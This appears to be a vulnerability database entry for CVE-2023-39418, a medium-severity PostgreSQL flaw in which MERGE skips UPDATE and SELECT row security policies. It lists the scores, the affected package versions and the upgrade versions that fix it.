CVE-2023-39418
Postgresql: merge fails to enforce update or select row security policies
4.3
MEDIUM
CVSS 3.1
EPSS 0.47%
Description
A vulnerability was found in PostgreSQL with the use of the MERGE command, which fails to test new rows against row security policies defined for UPDATE and SELECT. If UPDATE and SELECT policies forbid some rows that INSERT policies do not forbid, a user could store such rows.
How to fix CVE-2023-39418
To remediate CVE-2023-39418, upgrade the affected package to a fixed version below.
- —upgrade to 13.12-r0 or later
- —upgrade to 13.12-r0 or later
- —upgrade to 14.9-r0 or later
- —upgrade to 15.4-r0 or later
- —upgrade to 15.4.0 or later
- —upgrade to 15.5-0+deb12u1 or later
Is CVE-2023-39418 being exploited?
Low — EPSS is 0.5%, meaning exploitation activity has not been observed at scale.
Affected packages (6)
- from 0, < 13.12-r0
- from 0, < 13.12-r0
- from 0, < 14.9-r0
- from 0, < 15.4-r0
- >= 15.0.0, < 15.4.0
- from 0, < 15.5-0+deb12u1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM4.3 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |